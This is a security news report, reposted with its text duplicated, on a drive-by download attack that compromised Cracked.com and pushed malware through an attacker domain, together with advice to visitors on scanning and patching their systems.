If you've visited popular humor website
Cracked.com over the last few days, it's possible you may have been hit
by a drive-by-download attack, according to researchers at Barracuda
Labs. Scan your computer right away!
A researcher discovered on Nov. 10 that Cracked.com was hosting a drive-by download which delivered malware to site visitors with vulnerable systems, Barracuda Networks researchers Daniel Peck and Paul Royal wrote on the Barracuda Labs blog. It appears the attackers may have had access to the site as early as Nov. 4.
A drive-by-download occurs when malicious code on the Web page targets vulnerabilities in the software running on a user's computer. Unlike other Web-based attacks which require a user to click on a link or open a file, a drive-by can download malware or execute commands without any user action. The user is infected just by visiting the page.
A site administrator on Cracked.com posted to the user forums indicating the problem has been resolved as of Tuesday evening. "Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?"
Barracuda's Peck confirmed to SecurityWatch that the site was not currently compromised, but said that after looking into past issues with Cracked.com, these kinds of attacks "appear to be a recurring problem for them."
Details of the AttackIn this case, malicious JavaScript code on Cracked.com would request a malicious page from a different site owned by the attackers called crackedcdm.com. At this point, the attack page uses "a blend of malicious PDF, Java, and HTML/JavaScript files" to try to compromise the browser. Once the browser is compromised, the malware downloads and installs itself. At the time of publication, 24 out of 47 major antivirus vendors detect the malware, according to VirusTotal.
The only indication the user has that something may be wrong is by noticing that the Java plugin has launched and a message appears that system is low on memory.
Barracuda Labs warns that the "thousands of visitors" may have been exposed to the attack. Statistics collected by Alexa ranks Cracked.com as the 289th most popular site in the United States, and 654th in the world.
Peck said that initial findings indicate the attackers were using techniques and exploits similar to what is found in the Nuclear Exploit Pack. Many of the antivirus vendors also appear to be detecting the malware as part of the Androm botnet, he noted.
Trusted Site
If you visited Cracked.com in the past 10 days, update your antivirus signatures and scan your machines right away. It appears several of the major antivirus suites, including Kaspersky Lab, F-Secure, Trend Micro, Symantec, McAfee, and BitDefender, updated their signatures today to detect this malware, according to VirusTotal.
Also make sure you are staying on top of the updates for popularly targeted software, such as Adobe Reader, Java, and your Web browser, since these drive-by download depend on your having unpatched software. Many Web browsers, such as Google Chrome, also display big red warning screens about malware being detected on the site. If you are receiving a malware warning from your security software or browser, take it seriously and don't access the site. That funny article will keep.
It appears from looking at the Cracked.com forum postings that many people saw the warning and clicked the "Proceed" button anyway to get to the site. Don't do that!
The fact that Cracked.com doesn't proactively alert site visitors about these incidents, or provide remediation steps to clean up the systems "tends to indicate that Cracked.com should be avoided if you're concerned with malware," Barracuda Labs concluded in its post.
A researcher discovered on Nov. 10 that Cracked.com was hosting a drive-by download which delivered malware to site visitors with vulnerable systems, Barracuda Networks researchers Daniel Peck and Paul Royal wrote on the Barracuda Labs blog. It appears the attackers may have had access to the site as early as Nov. 4.
A drive-by-download occurs when malicious code on the Web page targets vulnerabilities in the software running on a user's computer. Unlike other Web-based attacks which require a user to click on a link or open a file, a drive-by can download malware or execute commands without any user action. The user is infected just by visiting the page.
A site administrator on Cracked.com posted to the user forums indicating the problem has been resolved as of Tuesday evening. "Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?"
Barracuda's Peck confirmed to SecurityWatch that the site was not currently compromised, but said that after looking into past issues with Cracked.com, these kinds of attacks "appear to be a recurring problem for them."
Details of the AttackIn this case, malicious JavaScript code on Cracked.com would request a malicious page from a different site owned by the attackers called crackedcdm.com. At this point, the attack page uses "a blend of malicious PDF, Java, and HTML/JavaScript files" to try to compromise the browser. Once the browser is compromised, the malware downloads and installs itself. At the time of publication, 24 out of 47 major antivirus vendors detect the malware, according to VirusTotal.
The only indication the user has that something may be wrong is by noticing that the Java plugin has launched and a message appears that system is low on memory.
Barracuda Labs warns that the "thousands of visitors" may have been exposed to the attack. Statistics collected by Alexa ranks Cracked.com as the 289th most popular site in the United States, and 654th in the world.
Peck said that initial findings indicate the attackers were using techniques and exploits similar to what is found in the Nuclear Exploit Pack. Many of the antivirus vendors also appear to be detecting the malware as part of the Androm botnet, he noted.
Trusted Site
If you visited Cracked.com in the past 10 days, update your antivirus signatures and scan your machines right away. It appears several of the major antivirus suites, including Kaspersky Lab, F-Secure, Trend Micro, Symantec, McAfee, and BitDefender, updated their signatures today to detect this malware, according to VirusTotal.
Also make sure you are staying on top of the updates for popularly targeted software, such as Adobe Reader, Java, and your Web browser, since these drive-by download depend on your having unpatched software. Many Web browsers, such as Google Chrome, also display big red warning screens about malware being detected on the site. If you are receiving a malware warning from your security software or browser, take it seriously and don't access the site. That funny article will keep.
It appears from looking at the Cracked.com forum postings that many people saw the warning and clicked the "Proceed" button anyway to get to the site. Don't do that!
The fact that Cracked.com doesn't proactively alert site visitors about these incidents, or provide remediation steps to clean up the systems "tends to indicate that Cracked.com should be avoided if you're concerned with malware," Barracuda Labs concluded in its post.
No comments:
Post a Comment